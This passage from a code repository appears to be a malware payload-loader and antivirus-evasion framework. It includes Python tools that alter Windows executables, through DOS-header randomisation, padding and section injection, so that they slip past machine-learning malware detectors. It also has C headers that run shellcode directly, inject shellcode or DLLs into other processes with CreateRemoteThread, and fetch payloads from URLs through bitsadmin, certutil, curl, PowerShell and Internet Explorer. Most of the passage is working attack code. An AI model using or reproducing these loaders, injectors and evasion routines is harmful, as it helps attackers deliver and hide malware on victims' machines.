of Full DOS practical manipulation. 50 | 51 | Create an adversarial example with practical manipulation applied. 52 | Random bytes are used and new sample has "_full_dos" as postfix. 53 | """ 54 | 55 | print(f"Executing Full DOS manipulation on: {exe_path}") 56 | 57 | exe_object: lief.PE.Binary = lief.parse(exe_path) 58 | 59 | # get range allowed to perturb 60 | pe_header_offset = exe_object.dos_header.addressof_new_exeheader 61 | range_to_perturb = list(range(2, 0x3c)) + \ 62 | list(range(0x40, pe_header_offset)) 63 | 64 | with open(exe_path, 'r+b') as f: 65 | raw_bytes = bytearray(f.read()) 66 | 67 | # perturb DOS header 68 | for i in range_to_perturb: 69 | raw_bytes[i] = ord(os.urandom(1)) 70 | 71 | with open(f"{exe_path[:-4]}_full_dos.exe", 'wb') as nf: 72 | # create executable 73 | nf.write(raw_bytes) 74 | 75 | 76 | # run as script 77 | if __name__ == "__main__": 78 | full_dos(sys.argv[1]) 79 | -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/practical_manipulations/padding.py: -------------------------------------------------------------------------------- 1 | """ 2 | Implementation of Padding practical manipulation from 3 | Functionality-Preserving Black-Box Optimization of Adversarial Windows Malware 4 | by Demetrio et al. 5 | 6 | Can be used standalone with random bytes or via genetic optimizer. 7 | """ 8 | 9 | import copy 10 | import os 11 | import sys 12 | 13 | 14 | def padding_on_bytes(exe_bytes: bytearray, section_population, vector_t): 15 | """ 16 | Implementation of Padding practical manipulation. 17 | Intended for use with genetic optimizer. 18 | 19 | Returns the bytes with the practical manipulation applied. 20 | """ 21 | 22 | content = bytearray() 23 | for i, section in enumerate(section_population): 24 | content += section[:int(round(len(section) * vector_t[i]))] 25 | 26 | raw_bytes = copy.deepcopy(exe_bytes) 27 | 28 | # append content 29 | raw_bytes += content 30 | 31 | return raw_bytes 32 | 33 | 34 | def padding(exe_path, amount): 35 | """ 36 | Implementation of Padding practical manipulation. 37 | 38 | Create an adversarial example with practical manipulation applied. 39 | Random bytes are used and new sample has "_padding" as postfix. 40 | """ 41 | 42 | print(f"Executing Padding manipulation on: {exe_path}") 43 | 44 | with open(exe_path, 'r+b') as f: 45 | raw_bytes = bytearray(f.read()) 46 | 47 | # append content 48 | raw_bytes += os.urandom(amount) 49 | 50 | with open(f"{exe_path[:-4]}_padding.exe", 'wb') as nf: 51 | nf.write(raw_bytes) 52 | 53 | 54 | # run as script 55 | if __name__ == "__main__": 56 | amount = 512 57 | if len(sys.argv) == 3: 58 | amount = int(sys.argv[2]) 59 | 60 | padding(sys.argv[1], amount) 61 | -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/practical_manipulations/partial_dos.py: -------------------------------------------------------------------------------- 1 | """ 2 | Implementation of Partial DOS proposed in 3 | Explaining Vulnerabilities of Deep Learning to Adversarial Malware Binaries 4 | by Demetrio et al. 5 | 6 | Can be used standalone with random bytes or via genetic optimizer. 7 | This file is not relevant for thesis. 8 | """ 9 | 10 | import os 11 | import sys 12 | import copy 13 | 14 | 15 | def partial_dos_on_bytes(exe_bytes: bytearray, section_population, vector_t): 16 | content = bytearray() 17 | for i, section in enumerate(section_population): 18 | content += section[:int(round(len(section) * vector_t[i]))] 19 | range_to_perturb = list(range(2, 0x3C)) 20 | 21 | raw_bytes = copy.deepcopy(exe_bytes) 22 | 23 | counter = 0 24 | for i in range_to_perturb: 25 | raw_bytes[i] = content[counter % len(content)] 26 | counter += 1 27 | 28 | return raw_bytes 29 | 30 | 31 | def partial_dos(exe_path): 32 | print(f"Executing Partial DOS manipulation on: {exe_path}") 33 | 34 | range_to_perturb = list(range(2, 0x3C)) 35 | 36 | with open(exe_path, 'r+b') as f: 37 | raw_bytes = bytearray(f.read()) 38 | 39 | for i in range_to_perturb: 40 | raw_bytes[i] = ord(os.urandom(1)) 41 | 42 | with open(f"{exe_path[:-4]}_partial_dos.exe", 'wb') as nf: 43 | nf.write(raw_bytes) 44 | 45 | 46 | # run as script 47 | if __name__ == "__main__": 48 | partial_dos(sys.argv[1]) 49 | -------------------------------------------------------------------------------- /source/implementations/gen_adversarial_exe/practical_manipulations/section_injection.py: -------------------------------------------------------------------------------- 1 | """ 2 | Implementation of Section Injection practical manipulation from 3 | Functionality-Preserving Black-Box Optimization of Adversarial Windows Malware 4 | by Demetrio et al. 5 | 6 | Can be used standalone with random bytes or via genetic optimizer. 7 | """ 8 | 9 | import os 10 | import random 11 | import string 12 | import sys 13 | 14 | import lief 15 | 16 | 17 | def section_injection_on_bytes(exe_bytes: bytearray, section_population, vector_t): 18 | """ 19 | Implementation of Section Injection practical manipulation. 20 | Intended for use with genetic optimizer. 21 | 22 | Returns the bytes with the practical manipulation applied. 23 | """ 24 | 25 | content = bytearray() 26 | for i, section in enumerate(section_population): 27 | content += section[:int(round(len(section) * vector_t[i]))] 28 | 29 | exe_object: lief.PE.Binary = lief.parse(exe_bytes) 30 | 31 | new_section = lief.PE.Section( 32 | ''.join(random.choice(string.ascii_lowercase) for i in range(5))) 33 | 34 | new_section.content = content 35 | new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE 36 | exe_object.add_section(new_section) 37 | 38 | builder = lief.PE.Builder(exe_object) 39 | builder.build() 40 | 41 | return bytearray(builder.get_build()) 42 | 43 | 44 | def section_injection(exe_path, amount): 45 | """ 46 | Implementation of Section Injection practical manipulation. 47 | 48 | Create an adversarial example with practical manipulation applied. 49 | Random bytes are used and new sample has "_section_injection" as postfix. 50 | """ 51 | 52 | print(f"Executing Section Injection manipulation on: {exe_path}") 53 | 54 | exe_object: lief.PE.Binary = lief.parse(exe_path) 55 | 56 | new_section = lief.PE.Section( 57 | ''.join(random.choice(string.ascii_lowercase) for i in range(5))) 58 | new_section.content = [ord(os.urandom(1)) for _ in range(amount)] 59 | new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE 60 | exe_object.add_section(new_section) 61 | 62 | builder = lief.PE.Builder(exe_object) 63 | builder.build() 64 | builder.write(f"{exe_path[:-4]}_section_injection.exe") 65 | 66 | 67 | # run as script 68 | if __name__ == "__main__": 69 | amount = 512 70 | if len(sys.argv) == 3: 71 | amount = int(sys.argv[2]) 72 | 73 | section_injection(sys.argv[1], amount) 74 | -------------------------------------------------------------------------------- /source/implementations/payload_execution_method/exec_shellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Currently ignores payload_info. 9 | // Currently also ignores shellcode_size, as the function binding does not require it. 10 | void exec_shellcode(unsigned char *shellcode, int shellcode_size, char *payload_info) { 11 | DEBUG_PRINT("exec_shellcode called.\n"); 12 | 13 | // Check for NULL pointer to handle cases where no shellcode data was retrieved 14 | if(shellcode != NULL) { 15 | int (*funct)(); 16 | funct = (int (*)()) shellcode; 17 | (int)(*funct)(); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /source/implementations/payload_execution_method/exec_shellcode64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Currently ignores payload_info 9 | // Requires shellcode_size for VirtualProtect call 10 | void exec_shellcode64(unsigned char *shellcode, int shellcode_size, char *payload_info) { 11 | DEBUG_PRINT("exec_shellcode64 called\n"); 12 | DEBUG_PRINT("Shellcode size: %d\n", shellcode_size); 13 | 14 | // Check for NULL pointer to handle cases where no shellcode data was retrieved 15 | if(shellcode != NULL) { 16 | DWORD l = 0; 17 | VirtualProtect(shellcode, shellcode_size, PAGE_EXECUTE_READWRITE, &l); 18 | (* (int(*)()) shellcode)(); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /source/implementations/payload_execution_method/exec_shellcode_ASCIIMSF.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Currently ignores payload_info 8 | // Currently also ignores shellcode_size, as it is not requires by the function binding 9 | void exec_shellcode_ASCIIMSF(unsigned char *shellcode, int shellcode_size, char *payload_info) { 10 | DEBUG_PRINT("exec_shellcode_ASCIIMSF called\n"); 11 | 12 | // Check for NULL pointer to handle cases where no shellcode data was retrieved 13 | if(shellcode != NULL) { 14 | register unsigned char *r asm("eax"); 15 | r = shellcode; 16 | asm("call *%eax;"); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /source/implementations/payload_execution_method/inject_dll.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // payload_info format: pid,dll_path 10 | // pid specifies the process ID of the process to inject the DLL into 11 | // dll_path specifies the path of the DLL that will be injected into the target. 12 | // This implies that the DLL to be injected must reside on the target's disk. 13 | // 14 | // This was sucessfully tested on both 32 ad 64-bit systems. 15 | // Friendly reminder: only inject 32-bit dlls into 32-bit processes, and 64-bit dlls into 64-bit processes 16 | void inject_dll(unsigned char *payload, int payload_size, char *payload_info) { 17 | char *delimiter; 18 | char *target_pid_string; 19 | char *dll_path; 20 | DWORD target_pid; 21 | LPVOID loadlibrary_address; 22 | LPVOID remote_buffer; 23 | HANDLE h_proc; 24 | HANDLE h_remote_thread; 25 | 26 | DEBUG_PRINT("Starting inject_dll routine...\n"); 27 | 28 | // Extract arguments from payload_info 29 | // Both pid and dll_path are required, so assume that delimiter ',' is set. 30 | 31 | // Cut out pid string by ending the string at delimiter position 32 | delimiter = strchr(payload_info, ','); 33 | target_pid_string = payload_info; 34 | *delimiter = '\0'; 35 | target_pid = strtoul(target_pid_string, NULL, 0); 36 | DEBUG_PRINT("Extracted payload_info::target_pid argument = %u\n", target_pid); 37 | 38 | // Extract dll_path string by starting after the delimiter 39 | dll_path = delimiter + 1; 40 | DEBUG_PRINT("Extracted payload_info::dll_path argument = %s\n", dll_path); 41 | 42 | if(target_pid == 0) { 43 | DEBUG_PRINT("Invalid target PID.\n"); 44 | return; 45 | } 46 | 47 | // Access target process 48 | DEBUG_PRINT("Accessing target process...\n"); 49 | h_proc = OpenProcess((PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, target_pid); 50 | 51 | if(h_proc == NULL) { 52 | DEBUG_PRINT("Failed to retrieve handle.\n"); 53 | return; 54 | } 55 | 56 | // Retrieve address of LoadLibraryA function 57 | DEBUG_PRINT("Retrieving address of LoadLibraryA function...\n"); 58 | loadlibrary_address = (LPVOID) GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 59 | if(loadlibrary_address == NULL) { 60 | DEBUG_PRINT("Failed to retrieve address.\n"); 61 | return; 62 | } 63 | 64 | // Allocate buffer in target process to store the path to the dll to be injected 65 | DEBUG_PRINT("Allocating at least %d bytes of memory in target process to store dll path...\n", strlen(dll_path)); 66 | remote_buffer = VirtualAllocEx(h_proc, NULL, strlen(dll_path), (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE); 67 | if(remote_buffer == NULL) { 68 | DEBUG_PRINT("Memory allocation failed, system error code is %u.\n", GetLastError()); 69 | return; 70 | } 71 | 72 | // Write dll path into allocated memory 73 | DEBUG_PRINT("Writing dll path into allocated memory...\n"); 74 | if(WriteProcessMemory(h_proc, remote_buffer, (LPCVOID) dll_path, strlen(dll_path), NULL) == 0) { 75 | DEBUG_PRINT("Write operation failed, system error code is %u.\n", GetLastError()); 76 | return; 77 | } 78 | 79 | // Creating remote thread that invokes the dll via LoadLibrary 80 | DEBUG_PRINT("Creating remote thread that invokes the DLL via LoadLibrary...\n"); 81 | h_remote_thread = CreateRemoteThread(h_proc, NULL, 0, (LPTHREAD_START_ROUTINE) loadlibrary_address, remote_buffer, 0, NULL); 82 | if(h_remote_thread == NULL) { 83 | DEBUG_PRINT("Thread creation failed, system error code is %u.\n", GetLastError()); 84 | return; 85 | } 86 | 87 | CloseHandle(h_proc); 88 | } 89 | -------------------------------------------------------------------------------- /source/implementations/payload_execution_method/inject_shellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // payload_info format: pid 9 | // pid specifies the process ID of the process to inject the shellcode into. 10 | // 11 | // This was successfully tested on both 32 and 64 bit systems 12 | void inject_shellcode(unsigned char *shellcode, int shellcode_size, char *payload_info) { 13 | DEBUG_PRINT("Starting inject_shellcode routine...\n"); 14 | 15 | // Extract PID from payload_info 16 | DWORD target_pid = strtoul(payload_info, NULL, 0); 17 | DEBUG_PRINT("Extracted payload_info::target_pid argument = %u\n", target_pid); 18 | 19 | if(target_pid == 0) { 20 | DEBUG_PRINT("Invalid target PID.\n"); 21 | return; 22 | } 23 | 24 | // Access target process 25 | DEBUG_PRINT("Accessing target process...\n"); 26 | HANDLE h_proc = OpenProcess((PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, target_pid); 27 | 28 | if(h_proc == NULL) { 29 | DEBUG_PRINT("Failed to retrieve handle.\n"); 30 | return; 31 | } 32 | 33 | // Allocate target memory for the shellcode 34 | DEBUG_PRINT("Allocating memory in target process...\n"); 35 | PVOID remote_buffer = VirtualAllocEx(h_proc, NULL, (SIZE_T) shellcode_size, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 36 | 37 | if(remote_buffer == NULL) { 38 | DEBUG_PRINT("Memory allocation failed.\n"); 39 | return; 40 | } 41 | 42 | // Write shellcode into allocated target buffer 43 | DEBUG_PRINT("Writing shellcode into allocated target buffer...\n"); 44 | if(WriteProcessMemory(h_proc, remote_buffer, (PBYTE) shellcode, (SIZE_T) shellcode_size, NULL) == 0) { 45 | DEBUG_PRINT("Write operation failed.\n"); 46 | return; 47 | } 48 | 49 | // Create and start new thread in the remote process, executing the shellcode 50 | DEBUG_PRINT("Creating new remote thread to execute shellcode...\n"); 51 | HANDLE h_remote_thread = CreateRemoteThread(h_proc, NULL, 0, (LPTHREAD_START_ROUTINE) remote_buffer, NULL, 0, NULL); 52 | if(h_remote_thread == NULL) { 53 | DEBUG_PRINT("Thread creation failed.\n"); 54 | return; 55 | } 56 | 57 | CloseHandle(h_proc); 58 | } 59 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/download_bitsadmin.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | #include "helper_functions/helper_functions.h" 8 | 9 | 10 | // Downloads data from the URI specified in arg1 into a file, using the BITSADMIN Windows tool. 11 | // The data is then read from the file and returned. 12 | // 13 | // data_size receives the size of the data in bytes. 14 | unsigned char *download_bitsadmin(char *arg1, int *data_size) { 15 | DEBUG_PRINT("Downloading data to file via bitsadmin...\n"); 16 | 17 | // File will be named as on the server 18 | char sh_filename[128]; 19 | strcpy(sh_filename, get_filename_from_url(arg1)); 20 | 21 | DEBUG_PRINT("sh_filename = %s\n", sh_filename); 22 | 23 | // Bitsadmin expects a full path. 24 | // Acquire full path + file name of this process. 25 | char current_path[MAX_PATH]; 26 | GetModuleFileNameA(NULL, current_path, MAX_PATH); 27 | 28 | // Replace executable name with payload name (after last '\') 29 | // Array size MAX_PATH should be large enough 30 | strcpy((strrchr(current_path, '\\') + 1), sh_filename); 31 | 32 | DEBUG_PRINT("current_path = %s\n", current_path); 33 | 34 | char download[500]; // how not to do it... 35 | sprintf(download, "bitsadmin.exe /transfer \"WinBitsJob\" %s %s", arg1, current_path); 36 | 37 | DEBUG_PRINT("command: %s\n", download); 38 | system(download); 39 | DEBUG_PRINT("Download done.\n"); 40 | 41 | *data_size = get_filesize(sh_filename); 42 | return load_textfile(sh_filename, *data_size); 43 | } 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/download_certutil.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | #include "helper_functions/helper_functions.h" 8 | 9 | 10 | // Downloads data from the URI specified in arg1 to a file. 11 | // The data is then retrieved from the file. 12 | // 13 | // data_size receives the size of the data in bytes. 14 | unsigned char* download_certutil(char *arg1, int *data_size) { 15 | DEBUG_PRINT("Downloading data to file via certutil...\n"); 16 | 17 | char download[500]; //how not to do it... 18 | sprintf(download,"certutil.exe -urlcache -split -f %s", arg1); 19 | 20 | DEBUG_PRINT("url: %s\n", download); 21 | 22 | system(download); 23 | 24 | DEBUG_PRINT("Download done.\n"); 25 | 26 | char sh_filename[128]; 27 | strcpy(sh_filename, get_filename_from_url(arg1)); 28 | 29 | DEBUG_PRINT("sh_filename = %s\n", sh_filename); 30 | 31 | *data_size = get_filesize(sh_filename); 32 | return load_textfile(sh_filename, *data_size); 33 | } 34 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/download_curl.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | #include "helper_functions/helper_functions.h" 8 | 9 | // Downloads Data with Curl 10 | // The data is then read from the file and returned. 11 | // 12 | // data_size receives the size of the data in bytes. 13 | 14 | unsigned char *download_curl(char *arg1, int *data_size) { 15 | DEBUG_PRINT("Downloading data to file via curl...\n"); 16 | 17 | char sh_filename[128]; 18 | strcpy(sh_filename, get_filename_from_url(arg1)); 19 | 20 | DEBUG_PRINT("sh_filename = %s\n", sh_filename); 21 | 22 | char download[500]; 23 | sprintf(download, "curl.exe %s -o %s", arg1, sh_filename); 24 | 25 | DEBUG_PRINT("command: %s\n", download); 26 | system(download); 27 | DEBUG_PRINT("Download done.\n"); 28 | 29 | *data_size = get_filesize(sh_filename); 30 | return load_textfile(sh_filename, *data_size); 31 | } 32 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/download_internet_explorer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | #include "helper_functions/helper_functions.h" 7 | 8 | 9 | // return pointer to the filename 10 | // string = url 11 | char* ie_download(char* string) { 12 | char ie[500]; 13 | GetEnvironmentVariable("PROGRAMFILES",ie,100); 14 | strcat(ie,"\\Internet Explorer\\iexplore.exe"); 15 | ShellExecute(0, "open", ie , string, NULL, SW_SHOWDEFAULT); 16 | 17 | // wait a little until the file is loaded 18 | Sleep(8000); 19 | 20 | // get the filename to search format in the ie temp directory 21 | char delimiter[] = "/"; 22 | char *ptr; 23 | char *fname; 24 | ptr = strtok(string, delimiter); 25 | while(ptr != NULL) 26 | { 27 | fname = ptr; 28 | ptr = strtok(NULL, delimiter); 29 | } 30 | 31 | DEBUG_PRINT("ie_download, filename: %s\n", fname); 32 | 33 | // split the filename 34 | char delimiter2[] = "."; 35 | char *sname; 36 | ptr = strtok(fname, delimiter2); 37 | sname = ptr; 38 | ptr = strtok(NULL, delimiter2); 39 | 40 | DEBUG_PRINT("ie_download, name to search for: %s\n", sname); 41 | 42 | // search for the file in user profile 43 | 44 | // build searchstring 45 | char tmp[150]; 46 | char tmp_home[150]; 47 | GetEnvironmentVariable ("USERPROFILE",tmp_home,150); 48 | GetEnvironmentVariable ("TEMP",tmp,150); 49 | tmp [ strlen(tmp) - 5 ] = 0x0; 50 | //printf("\n\n%s\n\n",tmp); 51 | char searchstring[500] = "/C "; 52 | strncat (searchstring,tmp_home,1); 53 | strcat (searchstring,": && cd \""); 54 | strcat (searchstring,tmp); 55 | strcat (searchstring,"\" && dir . /s /b | find \""); 56 | strcat (searchstring,sname); 57 | strcat (searchstring,"\" > \""); 58 | strcat (searchstring,tmp_home); 59 | strcat (searchstring,"\\datafile.txt\""); 60 | 61 | DEBUG_PRINT("ie_download, searchstring: %s\n", searchstring); 62 | 63 | // build & execute cmd 64 | char cmd[500]; 65 | GetEnvironmentVariable ("WINDIR",cmd,500); 66 | strcat (cmd,"\\system32\\cmd.exe"); 67 | ShellExecute (0, "open", "cmd.exe" , searchstring, NULL, SW_SHOWDEFAULT); 68 | 69 | //now read the directory + filename from the textfile 70 | char dirfile[500] = {0}; 71 | strcat (dirfile, tmp_home); 72 | strcat (dirfile, "\\datafile.txt"); 73 | char *sh_filename; 74 | int size_sh_filename=0; 75 | int counter = 0; 76 | while(size_sh_filename==0 && counter <= 1000) 77 | { 78 | size_sh_filename = get_filesize (dirfile); 79 | Sleep(500); 80 | counter++; 81 | } 82 | 83 | sh_filename = load_textfile (dirfile, size_sh_filename); 84 | // there is always emtpy space at the end of the file -> delete that 85 | sh_filename[size_sh_filename-2]=0x0; 86 | 87 | DEBUG_PRINT("ie_download, sh_filename: >>>%s<<<, size: %d\ntest\n", sh_filename, size_sh_filename); 88 | 89 | return sh_filename; 90 | } 91 | 92 | 93 | // Retrieval of data via IE download to file. The data is then read from the file and returned. 94 | // 95 | // arg1 specifies the URL to download the file from. 96 | // data_size receives the size of the data in bytes. 97 | unsigned char* download_internet_explorer(char *arg1, int *data_size) { 98 | DEBUG_PRINT("This is download_internet_explorer.\n"); 99 | DEBUG_PRINT("exec data from url\n"); 100 | 101 | char *sh_filename = ie_download(arg1); 102 | *data_size = get_filesize(sh_filename); 103 | return load_textfile(sh_filename, *data_size); 104 | } 105 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/download_powershell.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | #include "helper_functions/helper_functions.h" 8 | 9 | 10 | // Downloads data from the URI specified in arg1 into a file. 11 | // The data is then read from the file and returned. 12 | // 13 | // data_size receives the size of the data in bytes. 14 | unsigned char* download_powershell(char *arg1, int *data_size) { 15 | DEBUG_PRINT("Downloading data to file via powershell...\n"); 16 | 17 | char sh_filename[128]; 18 | strcpy(sh_filename, get_filename_from_url(arg1)); 19 | 20 | DEBUG_PRINT("sh_filename = %s\n", sh_filename); 21 | 22 | char download[500]; //how not to do it... 23 | sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadfile('%s','%s'))\"", arg1, sh_filename); 24 | 25 | DEBUG_PRINT("command: %s\n", download); 26 | system(download); 27 | DEBUG_PRINT("Download done.\n"); 28 | 29 | *data_size = get_filesize(sh_filename); 30 | return load_textfile(sh_filename, *data_size); 31 | } 32 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/dynamic_from_file.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | #include "helper_functions/helper_functions.h" 6 | 7 | 8 | // Dynamic retrieval of data from file 9 | // Dynamic in this context means that the data is not statically compiled into the executable, 10 | // but instead is retrieved from a file at run time. 11 | // 12 | // arg1 specifies the filename to fetch the data from. 13 | // data_size receives the size of the data in bytes. 14 | unsigned char *dynamic_from_file(char *arg1, int *data_size) { 15 | // First command line argument specifies the file name to read from 16 | char *filename = arg1; 17 | 18 | DEBUG_PRINT("Dynamically retrieving data from file %s...\n", filename); 19 | 20 | *data_size = get_filesize(filename); 21 | // Memory allocation is handled by load_textfile 22 | return load_textfile(filename, *data_size); 23 | } 24 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/from_command_line_hex.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Retrieves data from a "11aabb22..." format hex string given by arg1. 9 | // Can be used to retrieve data of such format from the command line if arg1 = argv[1]. 10 | // 11 | // data_size receives the size of the data in bytes. 12 | unsigned char *from_command_line_hex(char *arg1, int *data_size) { 13 | DEBUG_PRINT("Retrieving data from command line arguments, expecting hex format...\n"); 14 | // Get input string length 15 | int input_length = strlen(arg1); 16 | 17 | // Convert ASCII hex string into raw bytes 18 | char current_hex[5] = "0xaa"; 19 | 20 | // Each data byte is represented by 2 ASCII symbols 21 | *data_size = input_length / 2; 22 | unsigned char *data = (unsigned char *) malloc(*data_size); 23 | 24 | // Hex string is of format aabb01cc34... 25 | // Each loop iteration handles a 2-character chunk 26 | int j = 0; 27 | char *endptr; // Required by strtoul function 28 | 29 | for(int i = 0; i < input_length; i++) { 30 | // Interpret hex representation as unsigned char value 31 | memcpy(&(current_hex[2]), &(arg1[2 * i]), 2); 32 | data[j] = (unsigned char) strtoul(current_hex, &endptr, 16); 33 | j++; 34 | } 35 | 36 | return data; 37 | } 38 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/from_command_line_raw.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Retrieved data from the command line. 9 | // The given ASCII string is interpreted as raw byte data. 10 | // Can be used to retrieve data of such format from the command line if arg1 = argv[1]. 11 | // 12 | // data_size receives the size of the data in bytes. 13 | unsigned char *from_command_line_raw(char *arg1, int *data_size) { 14 | DEBUG_PRINT("Retrieving data from command line arguments, expecting raw ASCII format...\n"); 15 | // Get input string length 16 | *data_size = strlen(arg1); 17 | 18 | // Interpret as raw data and copy into new allocated buffer 19 | unsigned char *data = (unsigned char *) malloc(*data_size); 20 | memcpy(data, arg1, *data_size); 21 | 22 | return data; 23 | } 24 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/helper_functions/helper_functions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../../debug_print/debug_print.h" 6 | 7 | 8 | // Searches for the last occurence of the '/' character and returns the string remaining after that last occurence 9 | // Note that the return value will be pointing to the same string 10 | char *get_filename_from_url(char *url) { 11 | int index = -1; 12 | int i = 0; 13 | 14 | while(url[i] != '\0') 15 | { 16 | if(url[i] == '/') 17 | { 18 | index = i; 19 | } 20 | i++; 21 | } 22 | 23 | return &url[index + 1]; 24 | } 25 | 26 | 27 | // Returns the content size of the file given by fvalue 28 | int get_filesize(char *fvalue) { 29 | int size,rc1; 30 | FILE *fp1 = fopen(fvalue, "rb"); 31 | if (fp1 == NULL) 32 | { 33 | DEBUG_PRINT("get_filesize, %s not found\n", fvalue); 34 | return 0; 35 | } 36 | for (size = 0; (rc1 = getc(fp1)) != EOF; size++) {} 37 | fclose(fp1); 38 | 39 | DEBUG_PRINT("get_filesize, filesize %s: %d\n", fvalue, size); 40 | 41 | return size; 42 | } 43 | 44 | 45 | // Returns pointer to buffer that contains the file content 46 | // Automatically allocates memory for this 47 | unsigned char *load_textfile(char *fvalue, int size) { 48 | DEBUG_PRINT("load_textfile called: fvalue: %s, size: %d\n", fvalue, size); 49 | 50 | //allocate buffer, open file, read file to the buffer, close the file 51 | unsigned char *buffer = (unsigned char*) malloc(size+1); 52 | int i, rc; 53 | 54 | for (i=0; i 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Static retrieval of data from file. 8 | // Static in this context means that the data is statically compiled into the executable and therefore fixed after compilation time. 9 | // Data must be copied as a c-style array into get_shellcode.h by the build script. 10 | // 11 | // arg1 specifies which array the data is read from. 12 | // data_size receives the size of the data in bytes. 13 | unsigned char *static_from_file(char *arg1, int *data_size) { 14 | // Deliver address and size of array buf[] 15 | // If payload is retrieved statically, the define is set by the build script to notify this function that array buf[] is declared and known to the compiler. 16 | #ifdef STATIC_PAYLOAD 17 | if(strcmp(arg1, "static_payload") == 0) { 18 | DEBUG_PRINT("Statically retrieving data from array buf[] in included file...\n"); 19 | *data_size = sizeof(buf) - 1; 20 | return buf; 21 | } 22 | #endif 23 | // Deliver address and size of array key[] if key is requested 24 | // If the key is retrieved statically, the define is set by the build script to notify this function that array key[] is declared and known to the compiler. 25 | #ifdef STATIC_KEY 26 | if(strcmp(arg1, "static_key") == 0) { 27 | DEBUG_PRINT("Statically retrieving data from array key[] in included file...\n"); 28 | *data_size = sizeof(key) - 1; 29 | return key; 30 | } 31 | #endif 32 | // Deliver address and size of array payload_info[] if payload info is requested 33 | // If payload info is retrieved statically, the define is set by the build script to notify this function that array payload_info[] is declared and known to the compiler. 34 | #ifdef STATIC_PAYLOAD_INFO 35 | if(strcmp(arg1, "static_payload_info") == 0) { 36 | DEBUG_PRINT("Statically retrieving data from array payload_info[] in included file...\n"); 37 | *data_size = sizeof(payload_info) - 1; 38 | return payload_info; 39 | } 40 | #endif 41 | // Deliver address and size of array command[] if command is requested 42 | // If command is retrieved statically, the define is set by the build script to notify this function that array command[] is declared and known to the compiler. 43 | #ifdef STATIC_COMMAND 44 | if(strcmp(arg1, "static_command") == 0) { 45 | DEBUG_PRINT("Statically retrieving data from array command[] in included file...\n"); 46 | *data_size = sizeof(command) - 1; 47 | return command; 48 | } 49 | #endif 50 | 51 | // Return NULL if arg1 is unrecognized string or defines are not set correctly 52 | DEBUG_PRINT("Static retrieval from file failed; argument arg1 of function static_from_file not recognized and/or defines not correctly set in included headers?\n"); 53 | return NULL; 54 | } 55 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/static_from_here.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "static_from_file.h" 4 | 5 | 6 | // Static inclusion of data. 7 | // Data is formatted as array and written into the static_data.include file by the set_*_source function. 8 | // This function wraps static_from_file, as the prodecure is the same. 9 | // 10 | // arg1 specifies which array the data is read from. 11 | // data_size receives the size of the data in bytes. 12 | unsigned char *static_from_here(char *arg1, int *data_size) { 13 | return static_from_file(arg1, data_size); 14 | } 15 | -------------------------------------------------------------------------------- /source/payload_execution_method/payload_execution_method.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 